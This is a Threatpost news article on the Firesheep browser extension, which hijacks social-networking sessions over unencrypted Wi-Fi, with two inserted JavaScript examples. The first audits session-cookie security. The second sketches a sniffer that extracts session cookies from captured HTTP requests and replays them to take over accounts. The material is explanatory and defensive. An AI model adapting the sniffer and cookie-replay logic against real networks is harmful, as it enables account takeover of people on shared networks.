
Plugin, FireSheep, Lays Open Web 2.0 Insecurity


The browser plug-in offers one-click session hijacking for popular social networking apps. Creators call for better session security.

It’s no secret that Web sessions that use the bare HTTP protocol to transmit and receive data are susceptible to a variety of security attacks. What’s less clear is how much information is floating out there in the ether, especially with the rise of “Web 2.0” and rich social networking applications and other Web-based sharing tools.

But now a pair of researchers have created a tool to identify and capture the social networking sessions of those around you. The tool, a Firefox browser extension dubbed “Firesheep,” was demonstrated at the ToorCon hacking conference in San Diego on Sunday. Its primary purpose is to underscore the lack of effective transaction security for many popular social networking applications, including Facebook, Twitter, Flickr and iGoogle: it lets users browse public Wi-Fi networks for active sessions on those services, then take them over using a built-in “one-click” session hijacking feature.

Firesheep works on unencrypted wireless LAN connections, against services that send the session cookie over plain HTTP rather than HTTPS. Anyone on the same open network can read that cookie off the air and replay it in their own browser, which is all the “one-click” hijack amounts to; the server cannot tell the attacker’s requests from the victim’s.

The researchers, Ian Gallagher of Security Innovation in Seattle, Washington, and Eric Butler, an independent security consultant, also of Seattle, demonstrated Firesheep before an audience at ToorCon on Sunday: surveying and then hijacking audience members’ Facebook and iGoogle sessions. They warned that, without wider use of secure transaction tools for end-to-end Web encryption like SSL, more users were likely to fall victim to such attacks.

The problem isn’t new, Butler said, but has been the “elephant in the room” since the birth of the Web and the HTTP protocol that is its lingua franca. Technologies like virtual private networking (VPN) tools can help deter snooping on the local network, but they don’t provide end-to-end encryption of Web sessions (the traffic leaves the VPN endpoint as plain HTTP) and thus just “move the problem around,” Butler said.

Concerns about the ability to scale session encryption to the level needed to support traffic on massive social networks like Facebook are a likely obstacle, but both Gallagher and Butler argued that security and scalability can be achieved together. Search giant Google implemented SSL for its Gmail Web-based e-mail service without any noticeable change in service and without having to deploy massive new infrastructure to support it, the two noted. Other Web mail and software-as-a-service vendors should do the same, they argued.
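As an added example (not code from the article, from Firesheep or from its authors), the following check shows what a service has to get right for the hijack described above to fail: the session cookie must never travel over plain HTTP. The script audits a constructed HTTP response the way a reviewer would, flagging a session cookie issued over http:// or set without the Secure attribute, and compares a weak response with a hardened one. The cookie names and the two responses are made up for the illustration; the Strict-Transport-Security check is an extra hardening point beyond what the article discusses.

```javascript
// Added example, not Firesheep's code or the article's: audit whether a
// service's session cookie can be sniffed off an open network.
// A cookie is exposed if the browser will ever send it over plain HTTP,
// which happens when the site serves pages over http:// or sets the
// cookie without the Secure attribute. Cookie names and responses below
// are constructed for the example.

// Parse one Set-Cookie header into name, value and the flags we care about.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq).trim(),
    value: pair.slice(eq + 1).trim(),
    secure: false,
    httpOnly: false,
  };
  for (const a of attrs) {
    const key = a.split('=')[0].toLowerCase();
    if (key === 'secure') cookie.secure = true;
    if (key === 'httponly') cookie.httpOnly = true;
  }
  return cookie;
}

// response: { scheme: 'http' | 'https', headers: { 'set-cookie': [..], ... } }
// sessionCookieNames: which cookies identify the logged-in session.
// Returns a list of findings; an empty list means nothing for a sniffer to take.
function auditResponse(response, sessionCookieNames) {
  const findings = [];
  const cookies = (response.headers['set-cookie'] || []).map(parseSetCookie);
  for (const c of cookies) {
    if (!sessionCookieNames.includes(c.name)) continue; // e.g. a language preference
    if (response.scheme !== 'https') {
      findings.push(`${c.name}: session cookie issued over plain HTTP`);
    }
    if (!c.secure) {
      findings.push(`${c.name}: missing Secure, browser will send it on http:// links`);
    }
    if (!c.httpOnly) {
      findings.push(`${c.name}: missing HttpOnly, readable from page script`);
    }
  }
  // Beyond the article: without HSTS, http:// links are not upgraded to https.
  if (response.scheme === 'https' && !response.headers['strict-transport-security']) {
    findings.push('no Strict-Transport-Security header; http:// links are not upgraded');
  }
  return findings;
}

// The weak setting: login may have been over SSL, but the session cookie is
// handed out on a plain-HTTP page without Secure, exactly what Firesheep reads.
const weakResponse = {
  scheme: 'http',
  headers: { 'set-cookie': ['sid=abc123; Path=/', 'lang=en; Path=/'] },
};

// The hardened setting: everything over HTTPS, cookie marked Secure and HttpOnly,
// and HSTS so the browser never falls back to http://.
const hardenedResponse = {
  scheme: 'https',
  headers: {
    'set-cookie': ['sid=abc123; Path=/; Secure; HttpOnly', 'lang=en; Path=/'],
    'strict-transport-security': 'max-age=31536000',
  },
};

for (const [label, resp] of [['weak', weakResponse], ['hardened', hardenedResponse]]) {
  const findings = auditResponse(resp, ['sid']);
  console.log(`${label}: ${findings.length === 0 ? 'session cookie not exposed' : findings.join(' | ')}`);
}
```

The audit treats every session cookie independently: a site that only marks one of two session cookies Secure is still exposed, because the cleartext one alone may be enough to resume the session.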

The two posted a version of the Firesheep tool for Mac OS X and Windows for download (http://github.com/codebutler/firesheep/downloads) and encouraged others to download and try it out. The tool is also extensible: users can add Web services to those Firesheep detects with a few lines of JavaScript.
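Below, as an added example that is not Firesheep’s own code, is the shape of both the capture the article describes and the per-service extensibility it mentions: a handler names a site’s hostnames and session cookie names, a sniffer matches plaintext HTTP requests captured from an open wireless network against the registered handlers, and the “one-click” takeover is nothing more than replaying the captured cookies. The register(...) handler format, the service names and the captured requests are constructed for this illustration and are not Firesheep’s actual handler API.

```javascript
// Added example, not Firesheep's code: a minimal handler-driven passive
// sniffer of the kind the article describes. It walks constructed plaintext
// HTTP requests, as they would appear on an open wireless network, matches
// each request's Host against a registered service handler, and pulls out
// that service's session cookie(s). The handler fields (name, domains,
// sessionCookieNames) are an assumption for this example.

const handlers = [];

// A handler names the service, the hostnames it serves from and which cookies
// carry the session. Adding a new service is a few lines like the ones below.
function register(handler) {
  handlers.push(handler);
}

register({
  name: 'ExampleSocial', // hypothetical service
  domains: ['social.example', 'www.social.example'],
  sessionCookieNames: ['sid'],
});
register({
  name: 'ExampleMail', // hypothetical service with a two-cookie session
  domains: ['mail.example'],
  sessionCookieNames: ['auth', 'uid'],
});

// Parse the header block of one captured HTTP request.
function parseRequest(raw) {
  const lines = raw.split('\r\n');
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    if (!line) break; // blank line ends the headers
    const idx = line.indexOf(':');
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, path, headers };
}

// Cookie header -> { name: value }; a later duplicate overwrites an earlier one.
function parseCookies(cookieHeader) {
  const jar = {};
  if (!cookieHeader) return jar;
  for (const part of cookieHeader.split(';')) {
    const idx = part.indexOf('=');
    if (idx === -1) continue;
    jar[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return jar;
}

// Match one request against the handlers. Returns the captured session
// (service, host, cookies) or null when nothing usable was on the wire.
function captureSession(raw) {
  const req = parseRequest(raw);
  const host = (req.headers['host'] || '').split(':')[0].toLowerCase();
  const handler = handlers.find((h) => h.domains.includes(host));
  if (!handler) return null;
  const jar = parseCookies(req.headers['cookie']);
  const session = {};
  for (const name of handler.sessionCookieNames) {
    if (name in jar) session[name] = jar[name];
  }
  // Every named session cookie must be present, otherwise the user is not
  // logged in and there is no session to take over.
  if (Object.keys(session).length !== handler.sessionCookieNames.length) return null;
  return { service: handler.name, host, cookies: session };
}

// The "one-click" takeover: replay the captured cookies in a fresh request.
function hijackHeaders(captured) {
  const cookie = Object.entries(captured.cookies).map(([k, v]) => `${k}=${v}`).join('; ');
  return { Host: captured.host, Cookie: cookie };
}

function sniff(requests) {
  return requests.map(captureSession).filter((s) => s !== null);
}

// Constructed sample traffic as it would be seen on an open Wi-Fi network.
const capturedRequests = [
  'GET /home HTTP/1.1\r\nHost: www.social.example\r\nCookie: sid=abc123; lang=en\r\n\r\n',
  'GET /inbox HTTP/1.1\r\nHost: mail.example\r\nCookie: uid=42; auth=tok9\r\n\r\n',
  'GET /login HTTP/1.1\r\nHost: mail.example\r\nCookie: lang=en\r\n\r\n', // not logged in
  'GET / HTTP/1.1\r\nHost: news.example\r\n\r\n', // no handler registered
];

for (const s of sniff(capturedRequests)) {
  console.log(`${s.service} on ${s.host}: ${JSON.stringify(hijackHeaders(s))}`);
}
```

Nothing here breaks any cryptography: the sniffer only reads what the browser already sent in the clear, which is why the researchers’ fix is to stop sending the cookie in the clear at all.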


Authors

Threatpost
